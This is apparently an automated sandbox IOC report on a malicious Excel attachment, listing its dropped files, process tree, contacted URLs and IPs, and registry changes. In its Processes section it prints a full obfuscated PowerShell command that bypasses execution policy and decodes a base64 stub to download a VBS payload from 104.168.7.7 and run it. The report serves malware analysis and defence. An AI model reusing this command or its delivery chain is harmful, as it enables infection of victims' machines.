IOC Report
PI#0034250924.xla.xlsx

loading gif

Files

File Path
Type
Category
Malicious
PI#0034250924.xla.xlsx
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 30 02:09:56 2024, Security: 1
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\IEnetbookupdateion[1].hta
HTML document, ASCII text, with very long lines (65520), with CRLF line terminators
modified
malicious
C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\temp_exec.exe
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\Enetbookupdation.vbs
ASCII text, with very long lines (65478), with CRLF line terminators
dropped
malicious
C:\Users\user\Desktop\~$PI#0034250924.xla.xlsx
data
modified
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\IEnetbookupdation[1].vbs
ASCII text, with very long lines (65478), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6ACC71F0.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Temp\RESB8B5.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Sep 30 08:26:28 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\ao24xfvf\CSC75A1BB69F3FE4BED81ABA0ECFBA99BE.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.0.cs
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (358)
dropped
C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.out
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
modified
C:\Users\user\AppData\Local\Temp\fji3hte3.a5m.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\s4hj22iq.ipe.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\~DF096F86C2DF7A876A.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFF1E1590C893D8C32.TMP
data
dropped
C:\Users\user\Desktop\F7A30000
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 30 09:26:33 2024, Security: 1
dropped
C:\Users\user\Desktop\F7A30000:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
C:\Users\user\Desktop\PI#0034250924.xla.xls (copy)
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 30 09:26:33 2024, Security: 1
dropped
There are 12 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
malicious
C:\Windows\System32\mshta.exe
C:\Windows\System32\mshta.exe -Embedding
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" "/c pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
pOWeRSHelL.eXE -ex ByPASs -NoP -W 1 -C DEvICEcREdenTialDEPlOymenT ; Iex($(iEX('[sYsTEM.TexT.EnCODiNg]'+[ChAR]0x3A+[cHAr]58+'UtF8.gETstRING([SySTem.COnVERT]'+[chAR]0X3A+[cHAR]58+'FROMBase64StrinG('+[chAr]34+'JGIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbUVNYkVyZEVmSW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZanNPcXBMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdKclV3aSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYcSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc3ZLcGpXbFBZLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFBGalB6KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieXJabWN4d09YbiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRkpNd0h4ZUdIICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRiOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjcvMzU2L0lFbmV0Ym9va3VwZGF0aW9uLnZicyIsIiRlTnY6QVBQREFUQVxFbmV0Ym9va3VwZGF0aW9uLnZicyIsMCwwKTtzVGFSVC1TTGVFcCgzKTtTdGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcRW5ldGJvb2t1cGRhdGlvbi52YnMi'+[ChAr]34+'))')))"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.cmdline"
malicious
C:\Windows\System32\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Enetbookupdation.vbs"
malicious
C:\Users\user\AppData\Local\Temp\temp_exec.exe
"C:\Users\user\AppData\Local\Temp\temp_exec.exe"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB8B5.tmp" "c:\Users\user\AppData\Local\Temp\ao24xfvf\CSC75A1BB69F3FE4BED81ABA0ECFBA99BE.TMP"

URLs

Name
IP
Malicious
http://104.168.7.7/356/ce/IEnetbookupdateion.hta
104.168.7.7
malicious
http://104.168.7.7/356/IEnetbookupdation.vbs
104.168.7.7
malicious
http://nuget.org/NuGet.exe
unknown
https://og1.in/Ts9zjeS
unknown
http://crl.entrust.net/server1.crl0
unknown
https://og1.in/
unknown
http://104.168.7.7/356/ce/IEnetbookupdateion.hta...Sm
unknown
http://ocsp.entrust.net03
unknown
http://104.168.7.7/356/ce/IEnetbookupdateion.htac
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://og1.in/Ts9zjet5
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
http://104.168.7.7/356/ce/IEnetbookupdateion.htase
unknown
http://go.micros
unknown
https://og1.in/Ts9zje
172.67.216.244
https://og1.in/Ts9zje.htalicy
unknown
https://og1.in/Ts9zjeI5
unknown
http://104.168.7.7/356/ce/IEnetbookupdateion.htaxo
unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
http://104.168.7.7/356/IEnetbookupdation.vbsp
unknown
http://104.168.7.7/356/IEnetbookupdation.vbsiptor
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://104.168.7.7/356/ce/IEnetbookupdateion.htahttp://104.168.7.7/356/ce/IEnetbookupdateion.htaP
unknown
https://og1.in/Ts9zje#
unknown
http://104.168.7.7/356/IEnetbook
unknown
https://og1.in/X
unknown
http://ocsp.entrust.net0D
unknown
http://104.168.7.7/
unknown
http://104.168.7.7/356/ce/IEnetbookupdateion.htattingsk
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.comodo.com/CPS0
unknown
http://crl.entrust.net/2048ca.crl0
unknown
http://go.cr
unknown
http://104.168.7.7/356/ce/IEnetbookupdateion.htawwC:
unknown
There are 27 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
og1.in
172.67.216.244

IPs

IP
Domain
Country
Malicious
104.168.7.7
unknown
United States
malicious
104.21.78.54
unknown
United States
172.67.216.244
og1.in
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
8&/
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
%3/
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\3A9B7
3A9B7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
There are 35 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
400000
remote allocation
page execute and read and write
malicious
230000
direct allocation
page read and write
malicious
1F40000
direct allocation
page read and write
4DA0000
heap
page read and write
4D4C000
heap
page read and write
4A01000
heap
page read and write
7FE89C50000
trusted library allocation
page read and write
4D6D000
heap
page read and write
50EF000
heap
page read and write
4DBF000
heap
page read and write
4EBC000
heap
page read and write
4E64000
heap
page read and write
50F3000
heap
page read and write
4660000
trusted library allocation
page read and write
1FF4000
heap
page read and write
4E9E000
heap
page read and write
1FA7000
direct allocation
page read and write
4E22000
heap
page read and write
2F72000
trusted library allocation
page read and write
4DE1000
heap
page read and write
4D60000
heap
page read and write
1D98000
stack
page read and write
4F00000
heap
page read and write
4B78000
heap
page read and write
4D90000
heap
page read and write
395000
heap
page read and write
4F99000
heap
page read and write
4EEF000
heap
page read and write
501B000
heap
page read and write
4DC4000
heap
page read and write
4B71000
heap
page read and write
5003000
heap
page read and write
5062000
heap
page read and write
4FA2000
heap
page read and write
4F99000
heap
page read and write
4E51000
heap
page read and write
4F9C000
heap
page read and write
502D000
heap
page read and write
4E45000
heap
page read and write
4D46000
heap
page read and write
4E43000
heap
page read and write
4E99000
heap
page read and write
381000
heap
page read and write
4DAB000
heap
page read and write
7FE898B0000
trusted library allocation
page read and write
509B000
heap
page read and write
4DD1000
heap
page read and write
B84000
heap
page read and write
356000
heap
page read and write
1D0000
trusted library allocation
page read and write
4E1D000
heap
page read and write
50A8000
heap
page read and write
4EC4000
heap
page read and write
505F000
heap
page read and write
505A000
heap
page read and write
49B4000
heap
page read and write
479000
heap
page read and write
4D6D000
heap
page read and write
640000
heap
page read and write
4F3000
heap
page read and write
4EEA000
heap
page read and write
4DAA000
heap
page read and write
500C000
heap
page read and write
1AE16000
heap
page read and write
50E3000
heap
page read and write
37C000
heap
page read and write
5030000
heap
page read and write
4F8C000
heap
page read and write
47A000
heap
page read and write
7FE89986000
trusted library allocation
page execute and read and write
5080000
heap
page read and write
4F11000
heap
page read and write
5007000
heap
page read and write
4FC7000
heap
page read and write
39C000
heap
page read and write
4E67000
heap
page read and write
50CC000
heap
page read and write
5085000
heap
page read and write
7FE8B6DE000
trusted library allocation
page read and write
351000
heap
page read and write
3784000
heap
page read and write
4F29000
heap
page read and write
1C2A3000
heap
page read and write
3A6000
heap
page read and write
7FE89C30000
trusted library allocation
page read and write
5073000
heap
page read and write
B40000
direct allocation
page execute and read and write
4B43000
heap
page read and write
4FD5000
heap
page read and write
4B74000
heap
page read and write
50CE000
heap
page read and write
4E63000
heap
page read and write
50F2000
heap
page read and write
321000
heap
page read and write
50EA000
heap
page read and write
4E22000
heap
page read and write
4B4D000
heap
page read and write
4B76000
heap
page read and write
50B1000
heap
page read and write
360000
trusted library allocation
page read and write
381000
heap
page read and write
4F11000
heap
page read and write
4DB9000
heap
page read and write
4D76000
heap
page read and write
B47000
direct allocation
page execute and read and write
5006000
heap
page read and write
5019000
heap
page read and write
36B000
heap
page read and write
4E4A000
heap
page read and write
4E4F000
heap
page read and write
4E99000
heap
page read and write
1B400000
trusted library section
page read and write
4B20000
heap
page read and write
4F1B000
heap
page read and write
4B75000
heap
page read and write
2170000
heap
page execute and read and write
4F80000
heap
page read and write
4A79000
heap
page read and write
44A000
heap
page read and write
4B53000
heap
page read and write
50AA000
heap
page read and write
5078000
heap
page read and write
3B5D000
trusted library allocation
page read and write
505A000
heap
page read and write
4CD000
heap
page read and write
4E9B000
heap
page read and write
4D7C000
heap
page read and write
4B7A000
heap
page read and write
4E70000
heap
page read and write
35B000
heap
page read and write
4F0B000
heap
page read and write
4F00000
heap
page read and write
4E74000
heap
page read and write
7FE8B550000
trusted library allocation
page read and write
4ED0000
heap
page read and write
4FFC000
heap
page read and write
4E64000
heap
page read and write
3BB000
direct allocation
page read and write
40FE000
stack
page read and write
390000
heap
page read and write
4E31000
heap
page read and write
3799000
heap
page read and write
776000
heap
page read and write
7FE89C16000
trusted library allocation
page read and write
4DCC000
heap
page read and write
4E8B000
heap
page read and write
352000
heap
page read and write
7FE89BE0000
trusted library allocation
page read and write
1C31C000
heap
page read and write
50B5000
heap
page read and write
7FE8B6E0000
trusted library allocation
page execute and read and write
4EF4000
heap
page read and write
4D46000
heap
page read and write
50F9000
heap
page read and write
43B000
heap
page read and write
43A000
heap
page read and write
4E64000
heap
page read and write
1A720000
heap
page read and write
4F7E000
heap
page read and write
4F1B000
heap
page read and write
265000
heap
page read and write
4D7E000
heap
page read and write
5023000
heap
page read and write
4DEB000
heap
page read and write
4E37000
heap
page read and write
4E6F000
heap
page read and write
50F4000
heap
page read and write
4E94000
heap
page read and write
4B4F000
heap
page read and write
CC4000
direct allocation
page execute and read and write
502A000
heap
page read and write
124C1000
trusted library allocation
page read and write
379000
heap
page read and write
4E64000
heap
page read and write
4EC6000
heap
page read and write
5176000
heap
page read and write
4EBC000
heap
page read and write
5055000
heap
page read and write
1D50000
direct allocation
page read and write
5084000
heap
page read and write
1A71C000
stack
page read and write
1C7C0000
heap
page read and write
7FE89C10000
trusted library allocation
page read and write
3AD000
heap
page read and write
1C150000
heap
page read and write
26B4000
trusted library allocation
page read and write
501A000
heap
page read and write
5179000
heap
page read and write
4D99000
heap
page read and write
5041000
heap
page read and write
5194000
heap
page read and write
51A8000
heap
page read and write
3E8F000
trusted library allocation
page read and write
46F000
heap
page read and write
4FE6000
heap
page read and write
1B1BF000
stack
page read and write
4B4F000
heap
page read and write
4FA7000
heap
page read and write
4EF4000
heap
page read and write
4EF9000
heap
page read and write
3AC000
heap
page read and write
43B000
heap
page read and write
4F02000
heap
page read and write
4FAE000
heap
page read and write
4FC6000
heap
page read and write
505A000
heap
page read and write
4DDF000
heap
page read and write
4FDB000
heap
page read and write
7FE89B80000
trusted library allocation
page read and write
4D97000
heap
page read and write
504D000
heap
page read and write
7FE89B90000
trusted library allocation
page read and write
1BD40000
heap
page read and write
50E1000
heap
page read and write
4E8C000
heap
page read and write
4F0C000
heap
page read and write
421000
heap
page read and write
4AF6000
heap
page read and write
503D000
heap
page read and write
1C2C7000
heap
page read and write
2C30000
heap
page read and write
4D9F000
heap
page read and write
505F000
heap
page read and write
3A4000
heap
page read and write
4FAE000
heap
page read and write
375000
heap
page read and write
46B000
heap
page read and write
399000
heap
page read and write
3DF0000
trusted library allocation
page read and write
379D000
heap
page read and write
4DD0000
heap
page read and write
4FAE000
heap
page read and write
4EDF000
heap
page read and write
4CB000
heap
page read and write
1C3A1000
heap
page read and write
4F3A000
heap
page read and write
50CE000
heap
page read and write
339000
heap
page read and write
4E8C000
heap
page read and write
4D8B000
heap
page read and write
4E1E000
heap
page read and write
7FE89AE0000
trusted library allocation
page read and write
4E5A000
heap
page read and write
3A5000
heap
page read and write
5017000
heap
page read and write
4DD3000
heap
page read and write
4D73000
heap
page read and write
4F65000
heap
page read and write
355000
heap
page read and write
5112000
heap
page read and write
4B4F000
heap
page read and write
50F9000
heap
page read and write
4F00000
heap
page read and write
20000
heap
page read and write
5027000
heap
page read and write
4F02000
heap
page read and write
50FD000
heap
page read and write
3F5000
heap
page read and write
5073000
heap
page read and write
4E6C000
heap
page read and write
4E3A000
heap
page read and write
4F3B000
heap
page read and write
50F9000
heap
page read and write
5076000
heap
page read and write
4E31000
heap
page read and write
5040000
heap
page read and write
4B2B000
heap
page read and write
A2000
stack
page read and write
1D90000
direct allocation
page read and write
5035000
heap
page read and write
124BF000
trusted library allocation
page read and write
7FE8B530000
trusted library allocation
page read and write
505B000
heap
page read and write
1C37F000
heap
page read and write
4AF3000
heap
page read and write
1AF1F000
stack
page read and write
7FE8B6D0000
trusted library allocation
page read and write
3976000
trusted library allocation
page read and write
4D97000
heap
page read and write
34B000
heap
page read and write
3192000
trusted library allocation
page read and write
1ADE0000
heap
page read and write
4FE7000
heap
page read and write
4F33000
heap
page read and write
4F1E000
heap
page read and write
518C000
heap
page read and write
4980000
heap
page read and write
46C000
heap
page read and write
4E9000
heap
page read and write
4EF4000
heap
page read and write
50EA000
heap
page read and write
4EE3000
heap
page read and write
4F0B000
heap
page read and write
1E4000
heap
page read and write
381000
heap
page read and write
4FCE000
heap
page read and write
3AE000
heap
page read and write
379C000
heap
page read and write
50EF000
heap
page read and write
5021000
heap
page read and write
1A4B0000
heap
page read and write
455000
heap
page read and write
54D0000
heap
page read and write
39C000
heap
page read and write
20000
heap
page read and write
50D8000
heap
page read and write
4DBA000
heap
page read and write
2BED000
trusted library allocation
page read and write
5199000
heap
page read and write
4E15000
heap
page read and write
4E0A000
heap
page read and write
4FD2000
heap
page read and write
4E31000
heap
page read and write
4F2E000
heap
page read and write
30A5000
trusted library allocation
page read and write
4D56000
heap
page read and write
4E4F000
heap
page read and write
4F2F000
heap
page read and write
7D5000
heap
page read and write
5032000
heap
page read and write
4B6F000
heap
page read and write
4E37000
heap
page read and write
4F8C000
heap
page read and write
4D55000
heap
page read and write
12B59000
trusted library allocation
page read and write
4E21000
heap
page read and write
502B000
heap
page read and write
4FA4000
heap
page read and write
41E000
heap
page read and write
7FE89B30000
trusted library allocation
page read and write
4E31000
heap
page read and write
4DA0000
heap
page read and write
500C000
heap
page read and write
4D65000
heap
page read and write
4DB1000
heap
page read and write
4FFB000
heap
page read and write
347000
heap
page read and write
4F99000
heap
page read and write
5194000
heap
page read and write
355000
heap
page read and write
3AA000
heap
page read and write
4E94000
heap
page read and write
7FE89B60000
trusted library allocation
page read and write
3A3000
heap
page read and write
40B0000
heap
page read and write
4F3000
heap
page read and write
4F86000
heap
page read and write
10000
heap
page read and write
4D9A000
heap
page read and write
370000
heap
page read and write
5083000
heap
page read and write
4DD3000
heap
page read and write
516E000
heap
page read and write
30F0000
trusted library allocation
page execute
13190000
trusted library allocation
page read and write
394000
heap
page read and write
3F8E000
stack
page read and write
7FE89B70000
trusted library allocation
page read and write
50CB000
heap
page read and write
4E50000
heap
page read and write
4FF6000
heap
page read and write
31E000
heap
page read and write
4E2E000
heap
page read and write
50E3000
heap
page read and write
5198000
heap
page read and write
4E5C000
heap
page read and write
51A1000
heap
page read and write
4E35000
heap
page read and write
4DBB000
heap
page read and write
500A000
heap
page read and write
4E33000
heap
page read and write
5016000
heap
page read and write
50AD000
heap
page read and write
46F000
heap
page read and write
5113000
heap
page read and write
312E000
trusted library allocation
page read and write
676000
heap
page read and write
7FE898BB000
trusted library allocation
page read and write
4FF6000
heap
page read and write
343000
heap
page read and write
5058000
heap
page read and write
3DD000
heap
page read and write
4D4E000
heap
page read and write
4B78000
heap
page read and write
349000
heap
page read and write
7FE89A53000
trusted library allocation
page read and write
4F12000
heap
page read and write
4E61000
heap
page read and write
4D48000
heap
page read and write
7FE89C00000
trusted library allocation
page read and write
358000
heap
page read and write
39B000
heap
page read and write
4E64000
heap
page read and write
4F11000
heap
page read and write
465E000
stack
page read and write
4E00000
heap
page read and write
33F000
heap
page read and write
5078000
heap
page read and write
43A000
heap
page read and write
1CEBF000
stack
page read and write
4E51000
heap
page read and write
502D000
heap
page read and write
4DCF000
heap
page read and write
13253000
trusted library allocation
page read and write
4F89000
heap
page read and write
4B4F000
heap
page read and write
5039000
heap
page read and write
1B230000
heap
page read and write
1A69F000
stack
page read and write
5059000
heap
page read and write
4B48000
heap
page read and write
1C9DF000
stack
page read and write
340000
heap
page read and write
4FAE000
heap
page read and write
4E90000
heap
page read and write
50FB000
heap
page read and write
2D8B000
heap
page read and write
50B6000
heap
page read and write
4BA000
heap
page read and write
50AD000
heap
page read and write
5010000
heap
page read and write
33E000
heap
page read and write
3A6000
heap
page read and write
5054000
heap
page read and write
504D000
heap
page read and write
50DD000
heap
page read and write
504F000
heap
page read and write
1AAF8000
stack
page read and write
4F19000
heap
page read and write
4EE6000
heap
page read and write
33E000
heap
page read and write
50C7000
heap
page read and write
4E37000
heap
page read and write
4FD1000
heap
page read and write
4E23000
heap
page read and write
4DFE000
heap
page read and write
4D55000
heap
page read and write
3EB000
heap
page read and write
4E2A000
heap
page read and write
507D000
heap
page read and write
4FC8000
heap
page read and write
4E1B000
heap
page read and write
7FE89BE3000
trusted library allocation
page read and write
509D000
heap
page read and write
4FCD000
heap
page read and write
366000
heap
page read and write
4E21000
heap
page read and write
4FC5000
heap
page read and write
5020000
heap
page read and write
4F1E000
heap
page read and write
4E8A000
heap
page read and write
4FFE000
heap
page read and write
5006000
heap
page read and write
4D8E000
heap
page read and write
50F8000
heap
page read and write
546000
heap
page read and write
4EBC000
heap
page read and write
5011000
heap
page read and write
1B64F000
stack
page read and write
